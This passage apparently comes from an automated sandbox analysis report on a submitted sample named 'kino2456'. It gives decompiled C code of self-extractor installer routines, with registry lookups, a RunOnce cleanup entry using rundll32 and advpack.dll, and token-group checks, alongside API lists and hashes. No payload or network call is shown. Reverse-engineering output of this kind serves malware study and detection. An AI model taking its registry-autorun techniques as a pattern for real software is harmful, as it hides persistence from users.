                                                                                                                                                                                                                                    0x0096458f
                                                                                                                                                                                                                                    0x00964591
                                                                                                                                                                                                                                    0x00964592
                                                                                                                                                                                                                                    0x0096459b
                                                                                                                                                                                                                                    0x0096459e
                                                                                                                                                                                                                                    0x009645a3
                                                                                                                                                                                                                                    0x009645a9
                                                                                                                                                                                                                                    0x009645ad
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009645af
                                                                                                                                                                                                                                    0x009645af
                                                                                                                                                                                                                                    0x009645bf
                                                                                                                                                                                                                                    0x0096462d
                                                                                                                                                                                                                                    0x00964630
                                                                                                                                                                                                                                    0x0096463d
                                                                                                                                                                                                                                    0x0096464e
                                                                                                                                                                                                                                    0x0096464e
                                                                                                                                                                                                                                    0x0096463f
                                                                                                                                                                                                                                    0x00964640
                                                                                                                                                                                                                                    0x00964647
                                                                                                                                                                                                                                    0x0096464c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096464c
                                                                                                                                                                                                                                    0x00964666
                                                                                                                                                                                                                                    0x0096466d
                                                                                                                                                                                                                                    0x0096466f
                                                                                                                                                                                                                                    0x00964675
                                                                                                                                                                                                                                    0x00964675
                                                                                                                                                                                                                                    0x009645ad
                                                                                                                                                                                                                                    0x00964527
                                                                                                                                                                                                                                    0x0096452e
                                                                                                                                                                                                                                    0x0096453f
                                                                                                                                                                                                                                    0x0096453f
                                                                                                                                                                                                                                    0x00964530
                                                                                                                                                                                                                                    0x00964531
                                                                                                                                                                                                                                    0x00964538
                                                                                                                                                                                                                                    0x0096453d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096453d
                                                                                                                                                                                                                                    0x00964554
                                                                                                                                                                                                                                    0x0096455a
                                                                                                                                                                                                                                    0x0096455a
                                                                                                                                                                                                                                    0x0096455a
                                                                                                                                                                                                                                    0x00964525
                                                                                                                                                                                                                                    0x0096468c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 009645A3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 009645E3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 0096460D
                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00964630
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00964666
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0096466F
                                                                                                                                                                                                                                      • Part of subcall function 0096681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0096686E
                                                                                                                                                                                                                                      • Part of subcall function 0096681F: GetSystemMetrics.USER32(0000004A), ref: 009668A7
                                                                                                                                                                                                                                      • Part of subcall function 0096681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009668CC
                                                                                                                                                                                                                                      • Part of subcall function 0096681F: RegQueryValueExA.ADVAPI32(?,00961140,00000000,?,?,0000000C), ref: 009668F4
                                                                                                                                                                                                                                      • Part of subcall function 0096681F: RegCloseKey.ADVAPI32(?), ref: 00966902
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$doza2
                                                                                                                                                                                                                                    • API String ID: 3244514340-3130468218
                                                                                                                                                                                                                                    • Opcode ID: 4f9e6d8179ce939856277ab1914cbc99675f7f173eef97f0769193dee0c57ad6
                                                                                                                                                                                                                                    • Instruction ID: fd64829142c917db02844ae0aa0a20631a71c43c106245d3a5c5dc5bce2a95ea
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f9e6d8179ce939856277ab1914cbc99675f7f173eef97f0769193dee0c57ad6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97511772904219AFDB219FA8CC48BAA7B7DEF86304F144199FD0AB7241DB71DD05DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00962773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E00962773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x968004; // 0xf4cc89a0
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00961781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0096658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0096658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x961140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00961680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00966CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                                                    0x00962773
                                                                                                                                                                                                                                    0x0096277e
                                                                                                                                                                                                                                    0x00962785
                                                                                                                                                                                                                                    0x0096278a
                                                                                                                                                                                                                                    0x0096278d
                                                                                                                                                                                                                                    0x00962790
                                                                                                                                                                                                                                    0x00962792
                                                                                                                                                                                                                                    0x00962798
                                                                                                                                                                                                                                    0x0096279d
                                                                                                                                                                                                                                    0x009628b2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009627a3
                                                                                                                                                                                                                                    0x009627a3
                                                                                                                                                                                                                                    0x009627af
                                                                                                                                                                                                                                    0x009627c2
                                                                                                                                                                                                                                    0x009627c8
                                                                                                                                                                                                                                    0x009627cd
                                                                                                                                                                                                                                    0x009627d5
                                                                                                                                                                                                                                    0x009628b7
                                                                                                                                                                                                                                    0x009628b9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009627db
                                                                                                                                                                                                                                    0x009627dd
                                                                                                                                                                                                                                    0x009628aa
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009627e3
                                                                                                                                                                                                                                    0x009627e3
                                                                                                                                                                                                                                    0x009627ec
                                                                                                                                                                                                                                    0x009627f8
                                                                                                                                                                                                                                    0x00962803
                                                                                                                                                                                                                                    0x0096280b
                                                                                                                                                                                                                                    0x00962831
                                                                                                                                                                                                                                    0x009628c3
                                                                                                                                                                                                                                    0x009628c9
                                                                                                                                                                                                                                    0x009628cd
                                                                                                                                                                                                                                    0x00962837
                                                                                                                                                                                                                                    0x0096285a
                                                                                                                                                                                                                                    0x0096285c
                                                                                                                                                                                                                                    0x00962865
                                                                                                                                                                                                                                    0x00962892
                                                                                                                                                                                                                                    0x00962895
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962867
                                                                                                                                                                                                                                    0x00962878
                                                                                                                                                                                                                                    0x0096288c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096287a
                                                                                                                                                                                                                                    0x00962880
                                                                                                                                                                                                                                    0x00962885
                                                                                                                                                                                                                                    0x00962897
                                                                                                                                                                                                                                    0x00962899
                                                                                                                                                                                                                                    0x00962899
                                                                                                                                                                                                                                    0x00962878
                                                                                                                                                                                                                                    0x00962865
                                                                                                                                                                                                                                    0x009628a0
                                                                                                                                                                                                                                    0x009628bf
                                                                                                                                                                                                                                    0x009628c1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009628c1
                                                                                                                                                                                                                                    0x00962831
                                                                                                                                                                                                                                    0x009627dd
                                                                                                                                                                                                                                    0x009627d5
                                                                                                                                                                                                                                    0x009628e5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharUpperA.USER32(F4CC89A0,00000000,00000000,00000000), ref: 009627A8
                                                                                                                                                                                                                                    • CharNextA.USER32(0000054D), ref: 009627B5
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 009627BC
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962829
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00961140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962852
                                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962870
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009628A0
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 009628AA
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 009628B9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 009627E4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                    • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                    • Opcode ID: 98087d8d9d74082b0d3dca042cea967427bb4909a598e9ab255cf79fc23567c4
                                                                                                                                                                                                                                    • Instruction ID: a9821aee4ff85874e9d462c6dee93e35e392d1aaa7a77ab62be58233ad209b4f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98087d8d9d74082b0d3dca042cea967427bb4909a598e9ab255cf79fc23567c4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E641B571E0812CAFDB249B64DC85AEA7BBDEF56700F0440A9F645E3100DBB48E859FA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00962267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E00962267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x968004; // 0xf4cc89a0
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x968530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0096658A( &_v268, 0x104, 0x961140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
							E0096171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00966CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                                                    0x00962272
                                                                                                                                                                                                                                    0x00962277
                                                                                                                                                                                                                                    0x00962279
                                                                                                                                                                                                                                    0x00962283
                                                                                                                                                                                                                                    0x00962289
                                                                                                                                                                                                                                    0x009622ab
                                                                                                                                                                                                                                    0x009622b1
                                                                                                                                                                                                                                    0x009622c4
                                                                                                                                                                                                                                    0x009622e0
                                                                                                                                                                                                                                    0x009622e6
                                                                                                                                                                                                                                    0x009622f5
                                                                                                                                                                                                                                    0x0096230d
                                                                                                                                                                                                                                    0x0096231c
                                                                                                                                                                                                                                    0x0096231c
                                                                                                                                                                                                                                    0x00962321
                                                                                                                                                                                                                                    0x0096233a
                                                                                                                                                                                                                                    0x00962342
                                                                                                                                                                                                                                    0x00962348
                                                                                                                                                                                                                                    0x0096234b
                                                                                                                                                                                                                                    0x0096234c
                                                                                                                                                                                                                                    0x0096234c
                                                                                                                                                                                                                                    0x0096234e
                                                                                                                                                                                                                                    0x0096234f
                                                                                                                                                                                                                                    0x0096236e
                                                                                                                                                                                                                                    0x0096236e
                                                                                                                                                                                                                                    0x0096237a
                                                                                                                                                                                                                                    0x00962380
                                                                                                                                                                                                                                    0x00962380
                                                                                                                                                                                                                                    0x00962381
                                                                                                                                                                                                                                    0x00962381
                                                                                                                                                                                                                                    0x0096238f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 009622A3
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 009622D8
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 009622F5
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00962305
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0096236E
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0096237A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • wextract_cleanup2, xrefs: 0096227C, 009622CD, 00962363
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00962299
                                                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0096232D
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00962321
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                                                    • API String ID: 3027380567-2274915764
                                                                                                                                                                                                                                    • Opcode ID: 32e5976c47bc9fdc1944079fb2750f1ed20965996dfcef3c9974056097601581
                                                                                                                                                                                                                                    • Instruction ID: e0fb3b891d75098fbaa525c32b611f0718de2aea0d1d8de15ef73793c4a75305
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32e5976c47bc9fdc1944079fb2750f1ed20965996dfcef3c9974056097601581
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F231E371A04218ABCB219B60DC49FEBBB7CEB55744F0401E9F50DA6040EB75AF88CE50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00963100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E00963100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x968590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x968590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E009643D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x968d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x9688b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E009630C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                                                    0x00963108
                                                                                                                                                                                                                                    0x0096310b
                                                                                                                                                                                                                                    0x009631b7
                                                                                                                                                                                                                                    0x009631ca
                                                                                                                                                                                                                                    0x009631d0
                                                                                                                                                                                                                                    0x009631d0
                                                                                                                                                                                                                                    0x009631da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009631da
                                                                                                                                                                                                                                    0x00963111
                                                                                                                                                                                                                                    0x00963114
                                                                                                                                                                                                                                    0x00963136
                                                                                                                                                                                                                                    0x00963136
                                                                                                                                                                                                                                    0x00963138
                                                                                                                                                                                                                                    0x0096313b
                                                                                                                                                                                                                                    0x00963141
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963143
                                                                                                                                                                                                                                    0x00963116
                                                                                                                                                                                                                                    0x0096311b
                                                                                                                                                                                                                                    0x0096314b
                                                                                                                                                                                                                                    0x00963151
                                                                                                                                                                                                                                    0x00963158
                                                                                                                                                                                                                                    0x0096316a
                                                                                                                                                                                                                                    0x00963176
                                                                                                                                                                                                                                    0x0096317d
                                                                                                                                                                                                                                    0x0096318b
                                                                                                                                                                                                                                    0x0096319e
                                                                                                                                                                                                                                    0x009631a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009631ad
                                                                                                                                                                                                                                    0x00963120
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096312a
                                                                                                                                                                                                                                    0x00963134
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963134
                                                                                                                                                                                                                                    0x0096312c
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0096313B
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0096314B
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 0096316A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 00963176
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0096317D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 00963185
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 00963190
                                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,009630C0), ref: 009631A3
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 009631CA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 3785188418-612509477
                                                                                                                                                                                                                                    • Opcode ID: d82ccc8ecb8d3accf1745a45a10b0693405dd30b71c7894c925b46cc795d53cb
                                                                                                                                                                                                                                    • Instruction ID: 233094fa93b1b6ebc9954c279415c42847acecaabc6a7cf86e6bacc0813efafe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d82ccc8ecb8d3accf1745a45a10b0693405dd30b71c7894c925b46cc795d53cb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7011033125C211BBDB105F249C0CB5A3A68FB4B720F128619F922E11E0DBF49A41EB42
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009618A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                    			E009618A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x968004; // 0xf4cc89a0
				_v8 = _t23 ^ _t53;
				_t25 =  *0x968128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00966CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E009617EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x968128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x968128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                                                    0x009618a3
                                                                                                                                                                                                                                    0x009618a3
                                                                                                                                                                                                                                    0x009618ab
                                                                                                                                                                                                                                    0x009618b2
                                                                                                                                                                                                                                    0x009618b5
                                                                                                                                                                                                                                    0x009618be
                                                                                                                                                                                                                                    0x009618c0
                                                                                                                                                                                                                                    0x009618c6
                                                                                                                                                                                                                                    0x009618c7
                                                                                                                                                                                                                                    0x009618ca
                                                                                                                                                                                                                                    0x009618cf
                                                                                                                                                                                                                                    0x009619c9
                                                                                                                                                                                                                                    0x009619d8
                                                                                                                                                                                                                                    0x009619d8
                                                                                                                                                                                                                                    0x009618df
                                                                                                                                                                                                                                    0x009619b8
                                                                                                                                                                                                                                    0x009619bd
                                                                                                                                                                                                                                    0x009619bf
                                                                                                                                                                                                                                    0x009619bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009619bd
                                                                                                                                                                                                                                    0x009618fa
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961912
                                                                                                                                                                                                                                    0x009619aa
                                                                                                                                                                                                                                    0x009619ad
                                                                                                                                                                                                                                    0x009619b3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961927
                                                                                                                                                                                                                                    0x00961927
                                                                                                                                                                                                                                    0x00961932
                                                                                                                                                                                                                                    0x00961936
                                                                                                                                                                                                                                    0x009619a9
                                                                                                                                                                                                                                    0x009619a9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009619a9
                                                                                                                                                                                                                                    0x0096194c
                                                                                                                                                                                                                                    0x009619a2
                                                                                                                                                                                                                                    0x009619a3
